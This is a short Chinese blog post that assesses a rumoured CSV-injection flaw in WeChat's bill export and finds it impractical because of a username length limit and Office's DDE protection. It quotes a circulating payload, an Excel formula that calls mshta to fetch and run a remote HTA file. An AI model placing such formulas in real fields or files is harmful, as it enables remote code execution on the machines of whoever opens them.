查看原文
其他

关于微信csv导出漏洞

刨洞之眼 刨洞之眼 2023-08-14

先看图

网传payload:

=mshta|'http:\\ceye.io\1.hta'!A0

图片说的用户名改成以上payload,测试了一下是可以改的,但是长度有限制,下图多加了1个字符就是极限了,实战中基本不可能利用

漏洞在账单导出的地方,通过邮件附件的方式发送给你,然后你打开excel的时候触发,利用的就是csv注入而已,跟微信其实并没什么关系

而且office2016往后默认会开着DDE注入防护



加我微信好友,邀请你进交流群




您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存